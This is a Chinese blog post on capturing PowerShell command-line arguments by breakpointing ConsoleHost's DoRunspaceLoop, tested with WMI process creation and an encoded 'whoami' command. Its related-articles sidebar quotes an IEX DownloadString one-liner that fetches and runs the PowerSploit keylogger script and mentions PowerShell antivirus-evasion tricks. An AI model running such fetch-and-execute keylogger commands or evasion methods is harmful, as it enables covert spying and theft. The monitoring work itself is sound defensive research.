利用Hook的方式监控powershell的命令行参数

最新推荐文章于 2022-09-09 23:27:00 发布
最新推荐文章于 2022-09-09 23:27:00 发布
阅读量666 收藏
点赞数 1
分类专栏: 爱好 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37353105/article/details/122337183
版权

背景

之前老哥在搞powershell,然后我也了解一下,随后找到了一个系统函数。

步骤

首先一般样本在执行powershell的时候都是,powershell.exe + 命令行参数,这里用x96的来添加参数,先利用notepad试试水。

然后在microsoft.powershell.consolehost.ni.dll:Microsoft.PowerShell.ConsoleHost.DoRunspaceLoop(System.String, Boolean, System.Collections.ObjectModel.Collection`1<System.Management.Automation.Runspaces.CommandParameter>, Boolean, Boolean, System.String)下一个断点,不要问我这个符号哪里来的,之前blog说过。通过函数原型可以知道第一个参数就是string,也就是字符串,但是通常这种C# jit编译的都是__fastcall,所以第一个参数就是edx,为什么不是ecx,这种函数一般ecx都是对象,第一个参数就是edx,接下来看看结果。

 好点,参数我们成功拿到了,换成其他的wmi和一些加密属性在试试

Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe

-EncodedCommand dwBoAG8AYQBtAGkACgA=
//意思是who am i

还贴心的帮我们解码了

最后,祝大家拦截愉快,你问我hook怎么写?全局钩子+jit函数获取(之前blog又获取函数的方式)

被遗弃的庸才
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PowerShell监控——监控电脑屏幕操作记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
03-01 1907
目录 监控电脑屏幕? 实现思路 1、通过windows脚本,一定时间间隔进行屏幕抓拍 2、脚本通过powershell语言实现 3、powershellwindows系统自带语言,可以无缝嵌入运行 4、所有抓拍的屏幕照片,按照时间排序,可以实现比较完整的用户操作监控PowerShell简介 如何使用PowerShell 监控屏幕脚本实现 监控电脑屏幕? 如何实现对电脑屏幕及其操作的监控? 对于屏幕的监控,一般都是针对windows操作系统 因为对于大部分Linux系统,都是无
使用Powershell对目标进行屏幕监控
Ms08067安全实验室
03-09 792
Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的,具有实战价值。包括了...
SetWindowHookEx不能HOOK命令行(cmd.exe)
aibi9196的博客
09-23 205
SetWindowHookEx不能HOOK命令行(cmd.exe) Delphi / Windows SDK/APIhttp://www.delphi2007.net/DelphiAPI/html/delphi_20061203132155126.html 最近写了个API HOOK的小软件 利用SetWindowHookEx 实现对所有进程的HOOK 但...
通过机器学习来检测Powershell恶意行为
Ping_Pig的博客
08-12 708
讲在前面 国内外的各大厂商以及各类研究员多年来对在网络威胁中使用Powershell进行渗透的行为做了不同形式的报告,那么,为什么Poweshell在近几年的渗透中很受攻击中追捧呢,最大的特点就是Powershell的灵活性和丰富的功能使常规检测形同虚设。这篇文章在火眼(FireEye)的通过机器学习来检测Powershell恶意行为研究基础上进行部分修改后展示。 通过这篇文章,读者将会简单学习到: 为什么传统的“基于签名”或“基于规则”的检测引擎检测Powershell的威胁会遇到瓶颈 如何使用自
网络安全-powershell:powersploit Get-Keystrokes
u013930899的博客
05-11 581
1. Get-Keystrokes Get-Keystrokes是Exfiltration模块下的一个脚本,用于键盘记录,功能相当强大,不仅有键盘输入记录,甚至能记录鼠标的点击情况,还能记录详细的时间,实战时可以直接放入后台运行。 2. 下载脚本 IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Exfiltration/Get-Keystrokes.ps1") 3....
获取Powershell命令行参数
最新发布
墨鱼菜鸡
09-09 838
这个是偶然发现的,通过测试可以在r0中拿到在powershell输入的命令行参数。 原理是hook NtAlpcSendWaitReceivePort函数,通过解析该函数的第三个参数发现类型为0x01d8时候在偏移0xd0的位置就是powershell参数的位置 下面是代码 #include <Ntifs.h> #include &...
Keyboard-hook.zip_hook键盘监控
07-15
标题中的“Keyboard-hook.zip_hook键盘监控”提示我们讨论的核心是关于计算机编程中的一种技术,即键盘钩子(Keyboard Hook)。键盘钩子允许开发者创建应用程序来监视和处理键盘事件,通常是出于调试、输入检测或者...
vc hook钩子监控程序启动.visual c++
02-20
在IT领域,"vc hook钩子监控程序启动"是一个关于Windows系统编程的专题,主要涉及到的是利用Visual C++(VC++)开发一个程序,该程序能够通过钩子(hook)技术来监控其他程序的启动过程。钩子是Windows API提供的一...
ast-hook用于js逆向根据参数值快速定位到生成加密参数位置
05-04
`ast-hook`的核心功能就是利用AST进行代码分析。当我们在js逆向过程中需要找出某个特定参数是如何被加密或处理的,`ast-hook`可以快速遍历AST,查找与目标参数相关的表达式和语句。例如,我们可以设置一个hook,当...
利用Hook技术实现键盘监控
02-10
Hook(即钩子)技术编写的应用程序添加到Windows的任务栏的指示区中就能够 很好的达到这个目的。我在参考了API帮助文档基础上,根据在Delphi开发环境中 的具体实现分别对这两部分进行详细论述。 一、Hook(钩子)的...
DeviceIoControl、CreateFile,结合WMI读取物理硬盘网卡mac特征码,完整源码工程实例
10-09
DeviceIoControl() CreateFile() 读取硬件物理网卡mac完整工程实例 Vs2012 c++ 源代码 功能:结合WMI和DeviceIoControl获取网卡原生MAC地址和当前MAC地址 入口参数: iQueryType:需要获取的网卡类型 0:包括USB网卡 1:不包括USB网卡 pMacAddress:存储网卡MAC地址 uSize:可存储的最大网卡数目 返回值: -1:不支持的设备属性值 -2:WMI连接失败
hook wmi 修改机器码
12-23
通过wmi获取机器码的程序都要修改。有兴趣可以自己加上DeviceIoControl的hook应该可以过掉大部分获取机器码的程序
HDHook(附源码)HookAPI改变硬盘串号和MAC地址
05-18
VC++源码 一个使用detours来HookAPI的简单例子 DeviceIoControl获取硬盘串号 GetAdaptersInfo获取MAC Hook这两个API改变获取的硬盘串号和MAC地址 HDHook工程 生成dll GetHDDSN工程 载入生成的dll 获取硬盘串号和MAC地址 需要自行安装detours
API_HOOK监控删除和移动带有某字样的文件.rar
04-21
在这个场景中,"API_HOOK监控删除和移动带有某字样的文件.rar"是一个关于利用API Hook监控和控制文件操作的实践案例。 首先,我们需要理解API Hook的基本原理。API Hook通常通过以下几种方式实现: 1. **钩子...
PowerShell命令免杀思路
qq_44657899的博客
11-08 1486
文章目录前言大小写管道符修改函数名命令拆分反引号处理低版本powershell使用Out-EncryptedScript加密免杀base64免杀组合拳 前言 UNIX 系统一直有着功能强大的壳程序(shell),Windows PowerShell 的诞生就是要提供功能相当于 UNIX 系统的命令行壳程序(例如:sh、bash 或 csh),同时也内置脚本语言以及辅助脚本程序的工具,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 powershell 具有在硬盘中易绕过,内存中
关于wmi的参数拦截
被遗弃的庸才博客
07-24 1371
最近才刚刚上班,老大给了一个wmi的事件订阅的样本给我,叫我尝试拦截一下wmi的参数。 拿到任务首先去收一下有没有前人的代码可以借鉴(抄袭)的,看到有关于附加wmi的设备驱动的,好的,抄下来看看。具体实现是附加到WMIDataDevice设备上面,对IRP_MJ_SYSTEM_CONTROL进行过滤,然后就是什么都没有发生,之后看了一下微软给的wmi的驱动编程,由于网上没有现成的代码,本人技术拉跨,凭借拙略的英语阅读能力知道了要先注册下面这个函数,不然不给用IoWMIRegistrationControl
php 的shell脚本语言,下一代Shell脚本语言,Windows Power Shell!
weixin_29219539的博客
03-28 229
今天回家照常浏览了下cnbeta.com,看看有什么新鲜的内容。于是乎,就看到了那么一条 Windows Power Shell 1.0恩,我对这个东西很感兴趣,毕竟Windows目前的Shell是在是太弱了,立马从微软站点下载,安装,发现其是以补丁包的形式发布的,并非常规的MSI,那么,我估计Vista已经自带了这个东西了。下面将尝试了解PowerShell(以下简称PS)安装完成后,打开程序菜...
操作系统内核模块设计.doc
01-21
hook技术设计linux安全模块,实现对文件的访问控制

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值